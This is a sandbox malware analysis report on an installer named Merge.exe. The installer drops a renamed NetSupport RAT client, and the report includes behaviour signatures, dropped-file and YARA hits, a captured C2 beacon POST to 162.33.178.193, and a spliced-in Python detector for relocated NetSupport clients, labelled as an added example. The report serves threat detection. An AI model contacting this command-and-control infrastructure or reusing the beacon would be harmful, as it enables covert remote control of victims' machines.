Windows Analysis Report
Merge.exe

Overview

General Information

Sample name: Merge.exe
Analysis ID: 1575379
MD5: d024ff2fc7acb7c172f0ba38a9fbc2c3
SHA1: fd79908540ba4abf2beeeb7e93705b8bd8c6609f
SHA256: 113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1
Tags: AraxisMerge, CYNCLIMITED, exe, netsupport, user-NDA0E

Detection

NetSupport RAT
Score: 42
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 20
Range: 0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains functionality to change the wallpaper
PE file has a writeable .text section
PE file has nameless sections
Checks for available system drives (often done to infect USB drives)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
EXE planting / hijacking vulnerabilities found
Enables security privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • Merge.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\Merge.exe" MD5: D024FF2FC7ACB7C172F0BA38A9FBC2C3)
    • DisplayPhotoViewer.exe (PID: 7172 cmdline: "C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe" MD5: F78F5CC0A0B3AF7AF5485BB47B4809C0)
  • cleanup
No configs have been found
Yara matches on dropped files (Source | Rule | Description | Author):
C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
(3 further entries not shown)

Yara matches in memory dumps (Source | Rule | Description | Author):
00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000006.00000003.2951937785.000000000A642000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
(57 further entries not shown)

Yara matches on unpacked PEs (Source | Rule | Description | Author):
6.2.DisplayPhotoViewer.exe.7e20000.2.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
6.3.DisplayPhotoViewer.exe.a703500.66.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
6.3.DisplayPhotoViewer.exe.a773a49.94.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
6.3.DisplayPhotoViewer.exe.a75d8e8.56.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
6.3.DisplayPhotoViewer.exe.a742b50.62.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
(97 further entries not shown)
                                No Sigma rule has matched
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-12-15T11:50:17.359236+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49899 | 162.33.178.193 | 443 | TCP


                                AV Detection

Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\zxing.dll | ReversingLabs: Detection: 13%
Source: Merge.exe | Virustotal: Detection: 19%
Source: Merge.exe | ReversingLabs: Detection: 15%
Source: Merge.exe, 00000000.00000000.1850845816.0000000001B9F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | EXE: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe
Source: C:\Users\user\Desktop\Merge.exe | EXE: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe

                                Compliance

Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Unpacked PE file: 6.2.DisplayPhotoViewer.exe.9650000.3.unpack
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | EXE: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe
Source: C:\Users\user\Desktop\Merge.exe | EXE: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
Source: Merge.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Merge.exe | Static PE information: certificate valid
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MSVCR100.dll
Source: Merge.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: msvcr100.i386.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3284744274.000000006C641000.00000020.00000001.01000000.00000019.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2635853467.000000000B06B000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2617292451.000000000A8A1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F\ctl32\Full\pcichek.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3287171368.000000006F912000.00000002.00000001.01000000.00000017.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdbP source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\htctl32.pdbL source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F\ctl32\Full\pcichek.pdbN source: DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: m\1201\1201\ctl32\release\pcicapi.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\tcctl32.pdbP source: DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\FreeImageSVN\FreeImage\trunk\Win32\Release\FreeImage.pdbGCTL source: DisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmp
                                Source: Binary string: pcicapi.pdbm\1201\1201\ctl32\release\pcicapi.pdbH source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\tcctl32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A63B000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951937785.000000000A642000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2627011351.0000000007AED000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A624000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944484464.000000000A642000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3124698930.000000000A720000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935540782.000000000A642000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201\AudioCapture\Release\AudioCapture.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2616773901.0000000007AEE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\htctl32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\FreeImageSVN\FreeImage\trunk\Win32\Release\FreeImage.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened (drive-letter probe, in the order recorded): z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11103360 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_11103360
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110619A0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_110619A0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1102BC80 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102BC80
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
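The PDB build paths listed above (E:\nsmsrc\nsm\...\client32.pdb, pcichek.pdb, htctl32.pdb, tcctl32.pdb, pcicapi.pdb, AudioCapture.pdb) were found in the memory of DisplayPhotoViewer.exe, and the files dropped beside it carry stock NetSupport client component names. The following Python triage helper is an added example, not part of the Joe Sandbox report and not code from NetSupport or Araxis. It takes a directory listing and per-file extracted strings (both constructed sample data modelled on this report) and flags directories that look like a relocated NetSupport client, including a client executable running under a non-NetSupport name such as DisplayPhotoViewer.exe.

```python
"""Added example (not from the Joe Sandbox report): flag a directory that looks
like a renamed or relocated NetSupport Manager client.

Indicators are taken from the report: the dropped component file names
(remcmdstub.exe, audiocapture.dll, pcicapi.dll, pcichek.dll, htctl32.dll) and
the build PDB paths under E:\\nsmsrc\\nsm\\ found in DisplayPhotoViewer.exe
memory. The listing and strings below are constructed sample data.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# File names that ship with the NetSupport Manager client (dropped-file list
# and PDB names in the report), lower-cased for case-insensitive matching.
NETSUPPORT_COMPONENTS: Set[str] = {
    "client32.exe", "pcicl32.dll", "pcicapi.dll", "pcichek.dll",
    "htctl32.dll", "tcctl32.dll", "remcmdstub.exe", "audiocapture.dll",
}

# Build-tree prefix shared by every NetSupport PDB path in the report.
PDB_PATTERN = re.compile(r"E:\\nsmsrc\\nsm\\\S*?\.pdb", re.IGNORECASE)


@dataclass
class Finding:
    directory: str
    components: Set[str]           # stock component names present
    renamed: Dict[str, Set[str]]   # non-stock file name -> NetSupport PDB paths inside it

    def verdict(self) -> str:
        if self.renamed:
            return "NetSupport client under a non-NetSupport file name"
        return "multiple NetSupport client components present"


def triage(listing: Dict[str, List[str]],
           strings_by_file: Dict[str, List[str]]) -> List[Finding]:
    """listing: directory -> file names; strings_by_file: full path -> strings."""
    findings: List[Finding] = []
    for directory, files in listing.items():
        components = {f.lower() for f in files} & NETSUPPORT_COMPONENTS
        renamed: Dict[str, Set[str]] = {}
        for name in files:
            path = f"{directory}\\{name}"
            hits = {m.group(0)
                    for s in strings_by_file.get(path, [])
                    for m in PDB_PATTERN.finditer(s)}
            # A NetSupport PDB path inside a file that does not carry a stock
            # NetSupport name is the strongest single indicator.
            if hits and name.lower() not in NETSUPPORT_COMPONENTS:
                renamed[name] = hits
        if renamed or len(components) >= 2:
            findings.append(Finding(directory, components, renamed))
    return findings


# Constructed sample input modelled on the report's dropped-file list.
PROGRAMS = r"C:\Users\user\AppData\Local\Programs"
SAMPLE_LISTING = {
    PROGRAMS + r"\Advanced Photo Studio": [
        "DisplayPhotoViewer.exe", "remcmdstub.exe", "audiocapture.dll",
        "pcicapi.dll", "pcichek.dll", "htctl32.dll", "MSVCR100.dll", "zxing.dll",
    ],
    # Hypothetical benign directory that only shares library names.
    PROGRAMS + r"\Some Other App": ["otherapp.exe", "zxing.dll", "MSVCR100.dll"],
}
SAMPLE_STRINGS = {
    PROGRAMS + r"\Advanced Photo Studio\DisplayPhotoViewer.exe": [
        r"E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb",
        r"E:\nsmsrc\nsm\1201\1201F2\ctl32\release\htctl32.pdbL",
        r"D:\Projects\FreeImageSVN\FreeImage\trunk\Win32\Release\FreeImage.pdb",
    ],
    PROGRAMS + r"\Advanced Photo Studio\pcichek.dll": [
        r"E:\nsmsrc\nsm\1201\1201F\ctl32\Full\pcichek.pdb",
    ],
}


def main() -> None:
    for f in triage(SAMPLE_LISTING, SAMPLE_STRINGS):
        print(f"{f.directory}: {f.verdict()}")
        print("  components:", ", ".join(sorted(f.components)))
        for name, pdbs in f.renamed.items():
            print(f"  {name} contains {', '.join(sorted(pdbs))}")


if __name__ == "__main__":
    main()
```

On a live host the listing comes from a directory walk and the strings from `strings`/`floss` output per file; the threshold of two stock components keeps a lone pcicapi.dll shipped by some unrelated installer from firing on its own.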

                                Networking

Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49899 -> 162.33.178.193:443
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 104.26.1.231
Source: Joe Sandbox View | ASN Name: CORENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: dirklend.com
Source: global traffic | DNS traffic detected: DNS query: geo.netsupportsoftware.com
Source: unknown | HTTP traffic detected: POST http://162.33.178.193/fakeurl.htm HTTP/1.1 | User-Agent: NetSupport Manager/1.3 | Content-Type: application/x-www-form-urlencoded | Content-Length: 22 | Host: 162.33.178.193 | Connection: Keep-Alive | Body: CMD=POLL INFO=1 ACK=1
